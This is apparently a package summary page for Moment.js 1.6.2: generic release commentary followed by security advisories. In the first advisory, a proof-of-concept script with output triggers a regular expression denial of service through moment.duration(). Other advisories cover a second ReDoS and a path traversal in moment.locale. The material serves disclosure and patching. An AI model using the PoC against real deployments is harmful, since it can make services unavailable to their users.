Moment.js version 1.6.2, released on May 4th, 2012, followed closely on the heels of version 1.6.1, which was released just a week prior on April 26th, 2012. While the core description of Moment.js remains consistent – a JavaScript date library designed for creating, manipulating, and formatting dates without modifying the native Date object – the quick succession of releases hints at potential bug fixes, performance improvements, or minor feature enhancements.
Both versions share identical dependency configurations, relying on jshint for code quality, nodeunit for testing, and uglify-js for minification during development. This indicates a stable development workflow focused on maintaining code standards and optimizing for production. Developers familiar with the library will find a consistent API and behavior between these versions. The shared author information and repository details confirm continuity in maintainership and source control.
For developers considering using Moment.js, these versions offer a solid foundation for date handling in JavaScript. The library's strength lies in its ease of use and comprehensive formatting options, simplifying common date-related tasks. While the specific changes between 1.6.1 and 1.6.2 aren't explicitly detailed, the proximity of the releases suggests an incremental improvement to an already robust and popular date manipulation library. Developers should consult the official Moment.js changelog (if available) for a more granular understanding of the differences. However, either version offers a reliable choice for projects requiring flexible and powerful date management. Ultimately, users should opt for the latest stable version available at the time of their project's implementation.
All the vulnerabilities related to the version 1.6.2 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=20000;i<=10000000;i=i+10000) {
console.log("COUNT: " + i);
var str = '-' + genstr(i, '1')
console.log("LENGTH: " + str.length);
var start = process.hrtime();
moment.duration(str)
var end = process.hrtime(start);
console.log(end);
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg fr is directly used to switch moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
Are there any links users can visit to find out more?
If you have any questions or comments about this advisory: